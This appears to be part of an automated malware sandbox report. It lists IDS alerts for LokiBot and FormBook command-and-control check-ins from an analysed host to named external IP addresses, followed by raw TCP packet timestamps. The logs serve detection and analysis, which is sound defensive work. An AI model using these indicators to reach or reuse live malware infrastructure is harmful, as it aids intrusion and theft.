05/29/24-15:44:55.765644	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49780	80	192.168.2.9	45.61.137.215
05/29/24-15:42:46.507602	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49727	80	192.168.2.9	216.40.34.41
05/29/24-15:45:48.086059	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49799	80	192.168.2.9	45.61.137.215
05/29/24-15:45:50.249805	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49800	80	192.168.2.9	91.195.240.19
05/29/24-15:43:03.791896	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.9	45.61.137.215
05/29/24-15:43:38.811867	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.9	45.61.137.215
05/29/24-15:45:48.086059	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49799	80	192.168.2.9	45.61.137.215
05/29/24-15:43:11.942922	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49738	80	192.168.2.9	45.61.137.215
05/29/24-15:42:12.652341	TCP	2025381	ET TROJAN LokiBot Checkin	49714	80	192.168.2.9	45.61.137.215
05/29/24-15:45:39.931883	TCP	2025381	ET TROJAN LokiBot Checkin	49796	80	192.168.2.9	45.61.137.215
05/29/24-15:45:06.533178	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.9	45.61.137.215
05/29/24-15:43:38.811867	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.9	45.61.137.215
05/29/24-15:45:31.801523	TCP	2025381	ET TROJAN LokiBot Checkin	49793	80	192.168.2.9	45.61.137.215
05/29/24-15:43:41.466952	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.9	45.61.137.215
05/29/24-15:45:56.184812	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49803	80	192.168.2.9	45.61.137.215
05/29/24-15:45:09.224417	TCP	2025381	ET TROJAN LokiBot Checkin	49785	80	192.168.2.9	45.61.137.215
05/29/24-15:43:25.482920	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.9	45.61.137.215
05/29/24-15:45:56.184812	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49803	80	192.168.2.9	45.61.137.215
05/29/24-15:44:50.468524	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.9	45.61.137.215
05/29/24-15:42:55.680526	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.9	45.61.137.215
05/29/24-15:44:48.471145	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49777	80	192.168.2.9	34.132.146.171
05/29/24-15:46:01.734415	TCP	2025381	ET TROJAN LokiBot Checkin	49805	80	192.168.2.9	45.61.137.215
05/29/24-15:44:22.948804	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.9	45.61.137.215
05/29/24-15:44:22.948804	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.9	45.61.137.215
05/29/24-15:44:36.658231	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.9	45.61.137.215
05/29/24-15:44:36.658231	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49772	80	192.168.2.9	45.61.137.215
05/29/24-15:45:23.375856	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49789	80	192.168.2.9	45.61.137.215
05/29/24-15:46:10.058300	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49808	80	192.168.2.9	45.61.137.215
05/29/24-15:42:55.680526	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.9	45.61.137.215
05/29/24-15:43:36.155572	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.9	45.61.137.215
05/29/24-15:43:14.729917	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.9	45.61.137.215
05/29/24-15:43:22.752549	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.9	45.61.137.215
05/29/24-15:42:52.927476	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.9	45.61.137.215
05/29/24-15:43:06.437304	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49736	80	192.168.2.9	45.61.137.215
05/29/24-15:44:33.942473	TCP	2025381	ET TROJAN LokiBot Checkin	49771	80	192.168.2.9	45.61.137.215
05/29/24-15:43:01.102766	TCP	2025381	ET TROJAN LokiBot Checkin	49734	80	192.168.2.9	45.61.137.215
05/29/24-15:42:39.353995	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.9	45.61.137.215
05/29/24-15:43:22.752549	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.9	45.61.137.215
05/29/24-15:44:31.132505	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49770	80	192.168.2.9	45.61.137.215
05/29/24-15:44:47.749478	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49776	80	192.168.2.9	45.61.137.215
05/29/24-15:44:39.311748	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.9	45.61.137.215
05/29/24-15:43:46.833672	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.9	45.61.137.215
05/29/24-15:44:31.132505	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.9	45.61.137.215
05/29/24-15:45:09.224417	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.9	45.61.137.215
05/29/24-15:43:25.482920	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.9	45.61.137.215
05/29/24-15:44:25.723486	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49767	80	192.168.2.9	45.61.137.215
05/29/24-15:46:04.642667	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49806	80	192.168.2.9	45.61.137.215
05/29/24-15:44:17.418907	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.9	45.61.137.215
05/29/24-15:42:20.544811	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49717	80	192.168.2.9	45.61.137.215
05/29/24-15:44:47.749478	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49776	80	192.168.2.9	45.61.137.215
05/29/24-15:44:25.723486	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.9	45.61.137.215
05/29/24-15:45:09.224417	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49785	80	192.168.2.9	45.61.137.215
05/29/24-15:44:03.719373	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.9	45.61.137.215
05/29/24-15:45:17.857076	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49787	80	192.168.2.9	45.61.137.215
05/29/24-15:44:03.719373	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.9	45.61.137.215
05/29/24-15:42:33.985205	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.9	45.61.137.215
05/29/24-15:43:11.942922	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49738	80	192.168.2.9	45.61.137.215
05/29/24-15:43:30.801731	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.9	45.61.137.215
05/29/24-15:45:26.168825	TCP	2025381	ET TROJAN LokiBot Checkin	49790	80	192.168.2.9	45.61.137.215
05/29/24-15:42:33.985205	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.9	45.61.137.215
05/29/24-15:43:49.526860	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.9	45.61.137.215
05/29/24-15:45:34.630779	TCP	2025381	ET TROJAN LokiBot Checkin	49794	80	192.168.2.9	45.61.137.215
05/29/24-15:43:44.149214	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49751	80	192.168.2.9	45.61.137.215
05/29/24-15:42:36.746086	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.9	45.61.137.215
05/29/24-15:45:15.181530	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49786	80	192.168.2.9	45.61.137.215
05/29/24-15:43:44.149214	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.9	45.61.137.215
05/29/24-15:42:17.880992	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49716	80	192.168.2.9	45.61.137.215
05/29/24-15:44:00.934566	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.9	45.61.137.215
05/29/24-15:43:28.214472	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.9	45.61.137.215
05/29/24-15:45:15.181530	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.9	45.61.137.215
05/29/24-15:43:14.729917	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.9	45.61.137.215
05/29/24-15:46:01.734415	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49805	80	192.168.2.9	45.61.137.215
05/29/24-15:44:06.434631	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.9	45.61.137.215
05/29/24-15:44:00.934566	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.9	45.61.137.215
05/29/24-15:46:01.734415	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49805	80	192.168.2.9	45.61.137.215
05/29/24-15:45:53.430975	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49802	80	192.168.2.9	45.61.137.215
05/29/24-15:42:17.880992	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49716	80	192.168.2.9	45.61.137.215
05/29/24-15:45:53.430975	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49802	80	192.168.2.9	45.61.137.215
05/29/24-15:44:28.419439	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.9	45.61.137.215
05/29/24-15:44:42.013116	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.9	45.61.137.215
05/29/24-15:44:55.765644	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.9	45.61.137.215
05/29/24-15:44:50.468524	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.9	45.61.137.215
05/29/24-15:44:44.907872	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.9	45.61.137.215
05/29/24-15:45:06.533178	TCP	2025381	ET TROJAN LokiBot Checkin	49784	80	192.168.2.9	45.61.137.215
05/29/24-15:43:20.008059	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49741	80	192.168.2.9	45.61.137.215
05/29/24-15:45:48.086059	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49799	80	192.168.2.9	45.61.137.215
05/29/24-15:43:03.791896	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49735	80	192.168.2.9	45.61.137.215
05/29/24-15:43:20.008059	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49741	80	192.168.2.9	45.61.137.215
05/29/24-15:43:03.791896	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49735	80	192.168.2.9	45.61.137.215
05/29/24-15:42:50.288079	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.9	45.61.137.215
05/29/24-15:42:26.177150	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49720	80	192.168.2.9	45.61.137.215
05/29/24-15:42:50.288079	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.9	45.61.137.215
05/29/24-15:42:41.960861	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49726	80	192.168.2.9	45.61.137.215
05/29/24-15:43:55.212846	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.9	45.61.137.215
05/29/24-15:45:59.101278	TCP	2025381	ET TROJAN LokiBot Checkin	49804	80	192.168.2.9	45.61.137.215
05/29/24-15:42:41.960861	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49726	80	192.168.2.9	45.61.137.215
05/29/24-15:42:15.295734	TCP	2025381	ET TROJAN LokiBot Checkin	49715	80	192.168.2.9	45.61.137.215
05/29/24-15:42:58.351209	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.9	45.61.137.215
05/29/24-15:43:38.811867	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.9	45.61.137.215
05/29/24-15:45:39.931883	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49796	80	192.168.2.9	45.61.137.215
05/29/24-15:42:28.740548	TCP	2025381	ET TROJAN LokiBot Checkin	49721	80	192.168.2.9	45.61.137.215
05/29/24-15:44:09.285920	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.9	45.61.137.215
05/29/24-15:42:12.652341	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49714	80	192.168.2.9	45.61.137.215
05/29/24-15:42:58.351209	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.9	45.61.137.215
05/29/24-15:45:56.184812	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49803	80	192.168.2.9	45.61.137.215
05/29/24-15:44:58.470593	TCP	2025381	ET TROJAN LokiBot Checkin	49781	80	192.168.2.9	45.61.137.215
05/29/24-15:44:12.009845	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.9	45.61.137.215
05/29/24-15:45:37.356647	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49795	80	192.168.2.9	45.61.137.215
05/29/24-15:45:23.375856	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49789	80	192.168.2.9	45.61.137.215
05/29/24-15:45:03.852643	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49783	80	192.168.2.9	45.61.137.215
05/29/24-15:45:37.356647	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49795	80	192.168.2.9	45.61.137.215
05/29/24-15:43:52.300724	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49754	80	192.168.2.9	45.61.137.215
05/29/24-15:43:58.198557	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.9	45.61.137.215
05/29/24-15:45:42.784784	TCP	2025381	ET TROJAN LokiBot Checkin	49797	80	192.168.2.9	45.61.137.215
05/29/24-15:43:36.155572	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.9	45.61.137.215
05/29/24-15:43:52.300724	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49754	80	192.168.2.9	45.61.137.215
05/29/24-15:45:23.375856	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49789	80	192.168.2.9	45.61.137.215
05/29/24-15:43:36.155572	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.9	45.61.137.215

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 29, 2024 15:42:07.042393923 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.047343016 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.047497034 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.047645092 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.052778006 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.742849112 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.742865086 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.742938995 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.743079901 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.743091106 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.743104935 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.743127108 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.743156910 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.743170023 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.743184090 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.743191004 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.743197918 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.743213892 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.743246078 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.743246078 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.747870922 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.747894049 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.747909069 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.747921944 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.747930050 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.748028994 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.855196953 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855218887 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855232954 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855247021 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855262041 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855276108 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855276108 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.855329037 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.855329037 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.855463028 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855552912 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855565071 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855612993 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.855726004 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855740070 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855753899 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855792046 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.855792046 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.855798960 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855813026 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855827093 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.855869055 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.856631994 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.856674910 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.856679916 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.856698990 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.856714964 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.856726885 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.856755972 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.856856108 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.857213020 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.857229948 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.857245922 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.857263088 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.857281923 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.857362986 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.860255003 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.860270023 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.860341072 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.944516897 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967307091 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967324972 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967343092 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967351913 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967360973 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967370033 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967377901 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967391968 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.967391968 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.967395067 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967406034 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967418909 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967464924 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.967466116 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.967660904 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967680931 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967753887 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967782974 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967792988 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.967792988 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.967796087 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967824936 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967835903 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967874050 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.967874050 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.967875004 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967885017 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967895985 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967906952 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.967925072 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.968138933 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.968394041 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968497038 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968507051 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968519926 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968529940 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968539953 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968569040 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.968569040 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.968611956 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.968828917 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968936920 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968946934 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968957901 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968966961 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968978882 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968987942 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.968992949 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.968998909 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969042063 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.969042063 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.969366074 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969446898 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969458103 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969468117 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969479084 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969485998 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969496965 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969499111 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.969538927 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.969540119 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969552040 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969563007 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969571114 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969583035 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969590902 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.969593048 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.969624996 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.972312927 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.972337008 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.972347021 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:07.972398996 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:07.972398996 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.056817055 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.056840897 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.056898117 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079407930 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079456091 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079468012 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079480886 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079507113 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079519033 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079526901 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079543114 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079544067 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079554081 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079566956 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079579115 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079612017 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079612017 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079657078 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079669952 CEST	80	49709	77.105.36.123	192.168.2.9
